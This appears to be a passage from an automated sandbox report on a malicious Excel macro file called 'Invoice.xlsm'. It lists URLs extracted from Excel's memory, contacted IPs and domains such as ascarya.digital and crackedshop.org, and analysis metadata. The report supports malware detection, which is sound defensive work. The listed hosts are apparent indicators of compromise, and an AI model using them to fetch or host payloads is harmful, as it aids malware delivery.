                                            https://tasks.office.comEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.odwebp.svc.msmhCEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                		high
                                                https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                  		high
                                                  https://ascarya.digitEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.odwebp.svc.ms40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlSEXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://ascarya.digital/wp-conteEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                      		high
                                                      https://store.office.de/addinstemplateDeepLinkingServiceChinahttps://store.offi.EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                          		high
                                                          https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://graph.windows.net40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                            		high
                                                            https://api.diagnostics.office.com_UEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                              		high
                                                              https://ascarya.digital/wEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ascarya.digitalEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                		high
                                                                http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                  		high
                                                                  https://substrate.office.comPEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                    		high
                                                                    https://dataservice.o365filterinEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                      		high
                                                                      https://outlook.office.comSharepointFilesHostFormatEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://onedrive.live.com/embed?iEurM6EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://login.windows.net/common/oauth2/authorizecEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://clients.config.office.net/user/v1.0/ios40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                		high
                                                                                https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://login.windows.net/common/oauth2/authorizegEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechTEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://login.windows.net/common/oauth2/authorizeYEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://login.windows.net/common/oauth2/authorizeZEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                            		high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                              		high
                                                                                              https://login.windows.net/common/oauth2/authorize_EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizeTEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.com40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://login.windows.net/common/oauth2/authorizeJEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office.com/EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885884780.0000000012845000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://graph.windows.net/erEEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearerEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorizeNEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeOEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizeAEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorizeDEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://login.windows.net/common/oauth2/authorize9EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorize;EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  94.102.59.39
                                                                                                                                                  		crackedshop.orgNetherlands
                                                                                                                                                  		202425INT-NETWORKSCfalse
                                                                                                                                                  67.207.81.73
                                                                                                                                                  		ascarya.digitalUnited States
                                                                                                                                                  		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:532378
                                                                                                                                                  Start date:02.12.2021
                                                                                                                                                  Start time:07:10:36
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 10m 13s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Invoice.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:30
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.winXLSM@3/5@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 1
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Unable to detect Microsoft Excel
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.76.68, 52.109.88.37, 52.109.8.23
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Execution Graph export aborted for target EXCEL.EXE, PID 6032 because there are no executed function
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
